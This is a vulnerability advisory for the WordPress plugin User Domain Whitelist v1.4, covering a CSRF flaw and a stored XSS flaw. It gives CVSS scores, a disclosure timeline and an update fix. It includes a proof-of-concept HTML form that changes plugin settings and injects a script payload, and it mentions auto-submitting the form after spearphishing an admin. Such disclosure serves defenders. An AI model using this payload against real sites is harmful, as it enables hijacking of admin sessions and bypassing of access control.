XSS and CSRF in User Domain Whitelist v1.4

Vulnerability

Last revised: February 19, 2014

Contains a CSRF vulnerability which would allow anybody to create a page which when visited by a logged-in admin user could set any options within the plugin (thus allowing the plugin’s access control to be circumvented).

Contains a stored XSS vulnerability which would allow anybody to create a page which when visited by a logged-in admin would give the attacker full access to do anything the admin user can do within the admin interface.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	5.8 Medium
Vector	Network
Complexity	Medium
Authentication	None
Confidentiality	Partial
Integrity	Partial
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Here’s a simple form which switches the mode to blacklist which would allow anybody to register (assuming it was previously in whitelist mode). It also stores some XSS which will be displayed to the admin user, and will be displayed on subsequent visits to that page.

<form action="http://localhost/wp-admin/options-general.php?page=user-domain-whitelist.php" method="POST">
  <input type="text" name="update_HMUserDomainWhitelist" value="1">
  <input type="text" name="mode" value="black">
  <input type="text" name="domain_whitelist" value="&lt;/textarea>&lt;script>alert(1)&lt;/script>">
  <input type="submit">
</form>

Once the admin is cajoled into visiting a link of the attacker’s choosing (via spearphishing, perhaps) no further user interaction is required as the form can be submitted on page load with JavaScript.

Advisory timeline

Discovered: 2013-10-09
Reported to author: 2014-02-19
Reported as fixed by the author: 2014-02-22
Published: 2014-03-17

Mitigation/further actions

Update to version 1.5.

dxw advisories

Advisory: